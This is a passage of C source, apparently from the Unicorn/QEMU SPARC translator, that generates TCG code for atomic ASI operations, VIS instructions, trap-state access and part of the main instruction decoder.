    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);

    /* rd+1 = low word, hi = high word; one 8-byte store.  */
    tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi);
    r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26));
    r_size = tcg_const_i32(tcg_ctx, 8);
    gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    tcg_temp_free_i64(tcg_ctx, t64);
}
#endif

#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64)
/* CASA: 32-bit compare-and-swap via helper.  rd supplies the compare
   value and receives the loaded value.  The ASI source differs per
   target: run-time %asi/insn field on sparc64, insn field only on
   sparc32.  */
static inline void gen_cas_asi(DisasContext *dc, TCGv addr,
                               TCGv val2, int insn, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv val1 = gen_load_gpr(dc, rd);
    TCGv dst = gen_dest_gpr(dc, rd);
#ifdef TARGET_SPARC64
    TCGv_i32 r_asi = gen_get_asi(dc, insn, addr);
#else
    TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26));
#endif

    gen_helper_cas_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, val1, val2, r_asi);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    gen_store_gpr(dc, rd, dst);
}

/* LDSTUB with ASI: load a byte into dst, then store 0xff back to the
   same address (two helper calls — not atomic across agents).  */
static inline void gen_ldstub_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i64 r_val;
    TCGv_i32 r_asi, r_size;

    gen_ld_asi(dc, dst, addr, insn, 1, 0);

    r_val = tcg_const_i64(tcg_ctx, 0xffULL);
    r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26));
    r_size = tcg_const_i32(tcg_ctx, 1);
    gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_val, r_asi, r_size);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    tcg_temp_free_i64(tcg_ctx, r_val);
}
#endif

/* Fetch the rs1 operand (always a register, bits 13..17).  */
static TCGv get_src1(DisasContext *dc, unsigned int insn)
{
    unsigned int rs1 = GET_FIELD(insn, 13, 17);
    return gen_load_gpr(dc, rs1);
}

/* Fetch the rs2 operand: a sign-extended 13-bit immediate when the
   i bit is set, otherwise the register in bits 27..31.  */
static TCGv get_src2(DisasContext *dc, unsigned int insn)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    if (IS_IMM) { /* immediate */
target_long simm = GET_FIELDs(insn, 19, 31);
        TCGv t = get_temp_tl(dc);
        tcg_gen_movi_tl(tcg_ctx, t, simm);
        return t;
    } else { /* register */
        unsigned int rs2 = GET_FIELD(insn, 27, 31);
        return gen_load_gpr(dc, rs2);
    }
}

#ifdef TARGET_SPARC64
/* fmovs: conditional move of a single-precision FP register.
   dst = cmp ? f[rs] : f[rd].  */
static void gen_fmovs(DisasContext *dc, DisasCompare *cmp, int rd, int rs)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 c32, zero, dst, s1, s2;

    /* We have two choices here: extend the 32 bit data and use movcond_i64,
       or fold the comparison down to 32 bits and use movcond_i32.  Choose
       the latter.  */
    c32 = tcg_temp_new_i32(tcg_ctx);
    if (cmp->is_bool) {
        /* c1 already holds a 0/1 comparison result.  */
        tcg_gen_trunc_i64_i32(tcg_ctx, c32, cmp->c1);
    } else {
        TCGv_i64 c64 = tcg_temp_new_i64(tcg_ctx);
        tcg_gen_setcond_i64(tcg_ctx, cmp->cond, c64, cmp->c1, cmp->c2);
        tcg_gen_trunc_i64_i32(tcg_ctx, c32, c64);
        tcg_temp_free_i64(tcg_ctx, c64);
    }

    s1 = gen_load_fpr_F(dc, rs);
    s2 = gen_load_fpr_F(dc, rd);
    dst = gen_dest_fpr_F(dc);
    zero = tcg_const_i32(tcg_ctx, 0);

    tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dst, c32, zero, s1, s2);

    tcg_temp_free_i32(tcg_ctx, c32);
    tcg_temp_free_i32(tcg_ctx, zero);
    gen_store_fpr_F(dc, rd, dst);
}

/* fmovd: conditional move of a double FP register via movcond_i64.  */
static void gen_fmovd(DisasContext *dc, DisasCompare *cmp, int rd, int rs)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i64 dst = gen_dest_fpr_D(dc, rd);
    tcg_gen_movcond_i64(tcg_ctx, cmp->cond, dst, cmp->c1, cmp->c2,
                        gen_load_fpr_D(dc, rs),
                        gen_load_fpr_D(dc, rd));
    gen_store_fpr_D(dc, rd, dst);
}

/* fmovq: conditional move of a quad FP register, done as two 64-bit
   movconds on the backing cpu_fpr halves.  */
static void gen_fmovq(DisasContext *dc, DisasCompare *cmp, int rd, int rs)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    int qd = QFPREG(rd);
    int qs = QFPREG(rs);

    tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2], cmp->c1, cmp->c2,
                        tcg_ctx->cpu_fpr[qs / 2], tcg_ctx->cpu_fpr[qd / 2]);
    tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2 + 1], cmp->c1, cmp->c2,
                        tcg_ctx->cpu_fpr[qs / 2 + 1], tcg_ctx->cpu_fpr[qd / 2 + 1]);

gen_update_fprs_dirty(dc, qd);
}

/* Compute a pointer to the current trap state:
   tsptr = env->ts[env->tl & MAXTL_MASK].  */
static inline void gen_load_trap_state_at_tl(DisasContext *dc, TCGv_ptr r_tsptr, TCGv_ptr cpu_env)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_tl = tcg_temp_new_i32(tcg_ctx);

    /* load env->tl into r_tl */
    tcg_gen_ld_i32(tcg_ctx, r_tl, cpu_env, offsetof(CPUSPARCState, tl));

    /* tl = [0 ... MAXTL_MASK] where MAXTL_MASK must be power of 2 */
    tcg_gen_andi_i32(tcg_ctx, r_tl, r_tl, MAXTL_MASK);

    /* calculate offset to current trap state from env->ts, reuse r_tl */
    tcg_gen_muli_i32(tcg_ctx, r_tl, r_tl, sizeof (trap_state));
    tcg_gen_addi_ptr(tcg_ctx, r_tsptr, cpu_env, offsetof(CPUSPARCState, ts));

    /* tsptr = env->ts[env->tl & MAXTL_MASK] */
    {
        TCGv_ptr r_tl_tmp = tcg_temp_new_ptr(tcg_ctx);
        tcg_gen_ext_i32_ptr(tcg_ctx, r_tl_tmp, r_tl);
        tcg_gen_add_ptr(tcg_ctx, r_tsptr, r_tsptr, r_tl_tmp);
        tcg_temp_free_ptr(tcg_ctx, r_tl_tmp);
    }

    tcg_temp_free_i32(tcg_ctx, r_tl);
}

/* VIS edge8/16/32 (and their little-endian "l" forms): compute the edge
   mask for a partial store, optionally updating the condition codes as
   a subcc of the two addresses.  */
static void gen_edge(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2,
                     int width, bool cc, bool left)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv lo1, lo2, t1, t2;
    uint64_t amask, tabl, tabr;
    int shift, imask, omask;

    if (cc) {
        /* Record s1 - s2 in the CC sources/dest, as a subcc would.  */
        tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, s1);
        tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, s2);
        tcg_gen_sub_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, s1, s2);
        tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB);
        dc->cc_op = CC_OP_SUB;
    }

    /* Theory of operation: there are two tables, left and right (not to
       be confused with the left and right versions of the opcode).  These
       are indexed by the low 3 bits of the inputs.  To make things "easy",
       these tables are loaded into two constants, TABL and TABR below.
       The operation index = (input & imask) << shift calculates the index
       into the constant, while val = (table >> index) & omask calculates
       the value we're looking for.  */
    switch (width) {
    case 8:
        imask = 0x7;
        shift = 3;
        omask = 0xff;
        if (left) {
            tabl = 0x80c0e0f0f8fcfeffULL;
            tabr = 0xff7f3f1f0f070301ULL;
        } else {
            tabl = 0x0103070f1f3f7fffULL;
            tabr = 0xfffefcf8f0e0c080ULL;
        }
        break;
    case 16:
        imask = 0x6;
        shift = 1;
        omask = 0xf;
        if (left) {
            tabl = 0x8cef;
            tabr = 0xf731;
        } else {
            tabl = 0x137f;
            tabr = 0xfec8;
        }
        break;
    case 32:
        imask = 0x4;
        shift = 0;
        omask = 0x3;
        if (left) {
            tabl = (2 << 2) | 3;
            tabr = (3 << 2) | 1;
        } else {
            tabl = (1 << 2) | 3;
            tabr = (3 << 2) | 2;
        }
        break;
    default:
        abort();
    }

    lo1 = tcg_temp_new(tcg_ctx);
    lo2 = tcg_temp_new(tcg_ctx);
    tcg_gen_andi_tl(tcg_ctx, lo1, s1, imask);
    tcg_gen_andi_tl(tcg_ctx, lo2, s2, imask);
    tcg_gen_shli_tl(tcg_ctx, lo1, lo1, shift);
    tcg_gen_shli_tl(tcg_ctx, lo2, lo2, shift);

    t1 = tcg_const_tl(tcg_ctx, tabl);
    t2 = tcg_const_tl(tcg_ctx, tabr);
    tcg_gen_shr_tl(tcg_ctx, lo1, t1, lo1);
    tcg_gen_shr_tl(tcg_ctx, lo2, t2, lo2);
    tcg_gen_andi_tl(tcg_ctx, dst, lo1, omask);
    tcg_gen_andi_tl(tcg_ctx, lo2, lo2, omask);

    /* Compare only the aligned addresses; under 32-bit address masking
       (AM_CHECK) the upper half is ignored too.  */
    amask = -8;
    if (AM_CHECK(dc)) {
        amask &= 0xffffffffULL;
    }
    /* NOTE(review): this masks s1/s2 in place; they come from
       gen_load_gpr — confirm callers do not rely on the unmasked
       register values afterwards.  */
    tcg_gen_andi_tl(tcg_ctx, s1, s1, amask);
    tcg_gen_andi_tl(tcg_ctx, s2, s2, amask);

    /* We want to compute
         dst = (s1 == s2 ? lo1 : lo1 & lo2).
       We've already done dst = lo1, so this reduces to
         dst &= (s1 == s2 ? -1 : lo2)
       Which we perform by
         lo2 |= -(s1 == s2)
         dst &= lo2
    */
    tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t1, s1, s2);
    tcg_gen_neg_tl(tcg_ctx, t1, t1);
    tcg_gen_or_tl(tcg_ctx, lo2, lo2, t1);
    tcg_gen_and_tl(tcg_ctx, dst, dst, lo2);

    tcg_temp_free(tcg_ctx, lo1);
    tcg_temp_free(tcg_ctx, lo2);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t2);
}

/* alignaddr/alignaddrl: dst = (s1 + s2) & ~7; the low 3 bits of the
   (possibly negated) sum are deposited into GSR.align for use by
   faligndata.  */
static void gen_alignaddr(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2, bool left)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv tmp = tcg_temp_new(tcg_ctx);

    tcg_gen_add_tl(tcg_ctx, tmp, s1, s2);
    tcg_gen_andi_tl(tcg_ctx, dst, tmp, -8);
    if (left) {
        tcg_gen_neg_tl(tcg_ctx, tmp, tmp);
    }
    tcg_gen_deposit_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, *(TCGv *)tcg_ctx->cpu_gsr, tmp, 0, 3);

    tcg_temp_free(tcg_ctx, tmp);
}

/* faligndata: concatenate s1:s2 and extract 8 bytes at the byte offset
   held in GSR.align (low 3 bits of gsr).  */
static void gen_faligndata(TCGContext *tcg_ctx, TCGv dst, TCGv gsr, TCGv s1, TCGv s2)
{
    TCGv t1, t2, shift;

    t1 = tcg_temp_new(tcg_ctx);
    t2 = tcg_temp_new(tcg_ctx);
    shift = tcg_temp_new(tcg_ctx);

    tcg_gen_andi_tl(tcg_ctx, shift, gsr, 7);
    tcg_gen_shli_tl(tcg_ctx, shift, shift, 3);
    tcg_gen_shl_tl(tcg_ctx, t1, s1, shift);

    /* A shift of 64 does not produce 0 in TCG.  Divide this into a
       shift of (up to 63) followed by a constant shift of 1.
*/ + tcg_gen_xori_tl(tcg_ctx, shift, shift, 63); + tcg_gen_shr_tl(tcg_ctx, t2, s2, shift); + tcg_gen_shri_tl(tcg_ctx, t2, t2, 1); + + tcg_gen_or_tl(tcg_ctx, dst, t1, t2); + + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, shift); +} +#endif + +#define CHECK_IU_FEATURE(dc, FEATURE) \ + if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ + goto illegal_insn; +#define CHECK_FPU_FEATURE(dc, FEATURE) \ + if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ + goto nfpu_insn; + +/* before an instruction, dc->pc must be static */ +static void disas_sparc_insn(DisasContext * dc, unsigned int insn, bool hook_insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int opc, rs1, rs2, rd; + TCGv cpu_src1, cpu_src2; + TCGv_i32 cpu_src1_32, cpu_src2_32, cpu_dst_32; + TCGv_i64 cpu_src1_64, cpu_src2_64, cpu_dst_64; + target_long simm; + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + // Unicorn: trace this instruction on request + if (hook_insn && HOOK_EXISTS_BOUNDED(dc->uc, UC_HOOK_CODE, dc->pc)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, dc->uc, dc->pc); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + opc = GET_FIELD(insn, 0, 1); + rd = GET_FIELD(insn, 2, 6); + + switch (opc) { + case 0: /* branches/sethi */ + { + unsigned int xop = GET_FIELD(insn, 7, 9); + int32_t target; + switch (xop) { +#ifdef TARGET_SPARC64 + case 0x1: /* V9 BPcc */ + { + int cc; + + target = GET_FIELD_SP(insn, 0, 18); + target = sign_extend(target, 19); + target <<= 2; + cc = GET_FIELD_SP(insn, 20, 21); + if (cc == 0) + do_branch(dc, target, insn, 0); + else if (cc == 2) + do_branch(dc, target, insn, 1); + else + goto illegal_insn; + goto jmp_insn; + } + case 0x3: /* V9 BPr */ + { + target = GET_FIELD_SP(insn, 0, 13) | + (GET_FIELD_SP(insn, 20, 21) << 14); + target = sign_extend(target, 16); + target = 
(int32_t)((uint32_t)target << 2); + cpu_src1 = get_src1(dc, insn); + do_branch_reg(dc, target, insn, cpu_src1); + goto jmp_insn; + } + case 0x5: /* V9 FBPcc */ + { + int cc = GET_FIELD_SP(insn, 20, 21); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + target = GET_FIELD_SP(insn, 0, 18); + target = sign_extend(target, 19); + target = (int32_t)((uint32_t)target << 2); + do_fbranch(dc, target, insn, cc); + goto jmp_insn; + } +#else + case 0x7: /* CBN+x */ + { + goto ncp_insn; + } +#endif + case 0x2: /* BN+x */ + { + target = GET_FIELD(insn, 10, 31); + target = sign_extend(target, 22); + target = (int32_t)((uint32_t)target << 2); + do_branch(dc, target, insn, 0); + goto jmp_insn; + } + case 0x6: /* FBN+x */ + { + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + target = GET_FIELD(insn, 10, 31); + target = sign_extend(target, 22); + target = (int32_t)((uint32_t)target << 2); + do_fbranch(dc, target, insn, 0); + goto jmp_insn; + } + case 0x4: /* SETHI */ + /* Special-case %g0 because that's the canonical nop. */ + if (rd) { + uint32_t value = GET_FIELD(insn, 10, 31); + TCGv t = gen_dest_gpr(dc, rd); + tcg_gen_movi_tl(tcg_ctx, t, value << 10); + gen_store_gpr(dc, rd, t); + } + break; + case 0x0: /* UNIMPL */ + default: + goto illegal_insn; + } + break; + } + break; + case 1: /*CALL*/ + { + target_long target = (int)(((unsigned int)(GET_FIELDs(insn, 2, 31))) << 2); + TCGv o7 = gen_dest_gpr(dc, 15); + + tcg_gen_movi_tl(tcg_ctx, o7, dc->pc); + gen_store_gpr(dc, 15, o7); + target += dc->pc; + gen_mov_pc_npc(dc); +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + dc->npc = target; + } + goto jmp_insn; + case 2: /* FPU & Logical Operations */ + { + unsigned int xop = GET_FIELD(insn, 7, 12); + TCGv cpu_dst = get_temp_tl(dc); + TCGv cpu_tmp0; + + if (xop == 0x3a) { /* generate trap */ + int cond = GET_FIELD(insn, 3, 6); + TCGv_i32 trap; + int l1 = -1, mask; + + if (cond == 0) { + /* Trap never. 
*/ + break; + } + + save_state(dc); + + if (cond != 8) { + /* Conditional trap. */ + DisasCompare cmp; +#ifdef TARGET_SPARC64 + /* V9 icc/xcc */ + int cc = GET_FIELD_SP(insn, 11, 12); + if (cc == 0) { + gen_compare(dc, &cmp, 0, cond); + } else if (cc == 2) { + gen_compare(dc, &cmp, 1, cond); + } else { + goto illegal_insn; + } +#else + gen_compare(dc, &cmp, 0, cond); +#endif + l1 = gen_new_label(tcg_ctx); + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cmp.cond), + cmp.c1, cmp.c2, l1); + free_compare(tcg_ctx, &cmp); + } + + mask = ((dc->def->features & CPU_FEATURE_HYPV) && supervisor(dc) + ? UA2005_HTRAP_MASK : V8_TRAP_MASK); + + /* Don't use the normal temporaries, as they may well have + gone out of scope with the branch above. While we're + doing that we might as well pre-truncate to 32-bit. */ + trap = tcg_temp_new_i32(tcg_ctx); + + rs1 = GET_FIELD_SP(insn, 14, 18); + if (IS_IMM) { + rs2 = GET_FIELD_SP(insn, 0, 6); + if (rs1 == 0) { + tcg_gen_movi_i32(tcg_ctx, trap, (rs2 & mask) + TT_TRAP); + /* Signal that the trap value is fully constant. */ + mask = 0; + } else { + TCGv t1 = gen_load_gpr(dc, rs1); + tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); + tcg_gen_addi_i32(tcg_ctx, trap, trap, rs2); + } + } else { + TCGv t1, t2; + rs2 = GET_FIELD_SP(insn, 0, 4); + t1 = gen_load_gpr(dc, rs1); + t2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, t1, t1, t2); + tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); + } + if (mask != 0) { + tcg_gen_andi_i32(tcg_ctx, trap, trap, mask); + tcg_gen_addi_i32(tcg_ctx, trap, trap, TT_TRAP); + } + + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, trap); + tcg_temp_free_i32(tcg_ctx, trap); + + if (cond == 8) { + /* An unconditional trap ends the TB. */ + dc->is_br = 1; + goto jmp_insn; + } else { + /* A conditional trap falls through to the next insn. 
*/ + gen_set_label(tcg_ctx, l1); + break; + } + } else if (xop == 0x28) { + rs1 = GET_FIELD(insn, 13, 17); + switch(rs1) { + case 0: /* rdy */ +#ifndef TARGET_SPARC64 + /* undefined in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: + /* stbar in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x0f: + /* implementation-dependent in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + /* Read Asr17 */ + if (rs1 == 0x11 && dc->def->features & CPU_FEATURE_ASR17) { + TCGv t = gen_dest_gpr(dc, rd); + /* Read Asr17 for a Leon3 monoprocessor */ + tcg_gen_movi_tl(tcg_ctx, t, (1 << 8) | (dc->def->nwindows - 1)); + gen_store_gpr(dc, rd, t); + break; + } +#endif + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_y); + break; +#ifdef TARGET_SPARC64 + case 0x2: /* V9 rdccr */ + update_psr(dc); + gen_helper_rdccr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x3: /* V9 rdasi */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_asi); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x4: /* V9 rdtick */ + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_get_count(tcg_ctx, cpu_dst, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + gen_store_gpr(dc, rd, cpu_dst); + } + break; + case 0x5: /* V9 rdpc */ + { + TCGv t = gen_dest_gpr(dc, rd); + if (unlikely(AM_CHECK(dc))) { + tcg_gen_movi_tl(tcg_ctx, t, dc->pc & 0xffffffffULL); + } else { + tcg_gen_movi_tl(tcg_ctx, t, dc->pc); + } + gen_store_gpr(dc, rd, t); + } + break; + case 0x6: /* V9 rdfprs */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, 
tcg_ctx->cpu_fprs); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0xf: /* V9 membar */ + break; /* no effect */ + case 0x13: /* Graphics Status */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_gsr); + break; + case 0x16: /* Softint */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_softint); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x17: /* Tick compare */ + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_tick_cmpr); + break; + case 0x18: /* System tick */ + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_get_count(tcg_ctx, cpu_dst, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + gen_store_gpr(dc, rd, cpu_dst); + } + break; + case 0x19: /* System tick compare */ + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_stick_cmpr); + break; + case 0x10: /* Performance Control */ + case 0x11: /* Performance Instrumentation Counter */ + case 0x12: /* Dispatch Control */ + case 0x14: /* Softint set, WO */ + case 0x15: /* Softint clear, WO */ +#endif + default: + goto illegal_insn; + } +#if !defined(CONFIG_USER_ONLY) + } else if (xop == 0x29) { /* rdpsr / UA2005 rdhpr */ +#ifndef TARGET_SPARC64 + if (!supervisor(dc)) { + goto priv_insn; + } + update_psr(dc); + gen_helper_rdpsr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); +#else + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + rs1 = GET_FIELD(insn, 13, 17); + switch (rs1) { + case 0: // hpstate + // gen_op_rdhpstate(); + break; + case 1: // htstate + // gen_op_rdhtstate(); + break; + case 3: // hintp + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_hintp); + break; + case 5: // htba + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_htba); + break; + case 6: // hver + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_hver); + break; + case 31: // hstick_cmpr + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv 
*)tcg_ctx->cpu_hstick_cmpr); + break; + default: + goto illegal_insn; + } +#endif + gen_store_gpr(dc, rd, cpu_dst); + break; + } else if (xop == 0x2a) { /* rdwim / V9 rdpr */ + if (!supervisor(dc)) { + goto priv_insn; + } + cpu_tmp0 = get_temp_tl(dc); +#ifdef TARGET_SPARC64 + rs1 = GET_FIELD(insn, 13, 17); + switch (rs1) { + case 0: // tpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 1: // tnpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tnpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 2: // tstate + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tstate)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 3: // tt + { + TCGv_ptr r_tsptr = tcg_temp_new_ptr(tcg_ctx); + + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tt)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 4: // tick + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_get_count(tcg_ctx, cpu_tmp0, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 5: // tba + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_tbr); + break; + case 6: // pstate + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, pstate)); + break; + case 7: // tl + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tl)); 
+ break; + case 8: // pil + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, psrpil)); + break; + case 9: // cwp + gen_helper_rdcwp(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env); + break; + case 10: // cansave + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, cansave)); + break; + case 11: // canrestore + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, canrestore)); + break; + case 12: // cleanwin + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, cleanwin)); + break; + case 13: // otherwin + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, otherwin)); + break; + case 14: // wstate + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, wstate)); + break; + case 16: // UA2005 gl + CHECK_IU_FEATURE(dc, GL); + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, gl)); + break; + case 26: // UA2005 strand status + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_ssr); + break; + case 31: // ver + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_ver); + break; + case 15: // fq + default: + goto illegal_insn; + } +#else + tcg_gen_ext_i32_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_wim); +#endif + gen_store_gpr(dc, rd, cpu_tmp0); + break; + } else if (xop == 0x2b) { /* rdtbr / V9 flushw */ +#ifdef TARGET_SPARC64 + save_state(dc); + gen_helper_flushw(tcg_ctx, tcg_ctx->cpu_env); +#else + if (!supervisor(dc)) + goto priv_insn; + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_tbr); +#endif + break; +#endif + } else if (xop == 0x34) { /* FPU Operations */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_op_clear_ieee_excp_and_FTT(dc); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + xop = GET_FIELD(insn, 18, 26); + save_state(dc); + switch (xop) { + case 0x1: /* fmovs */ 
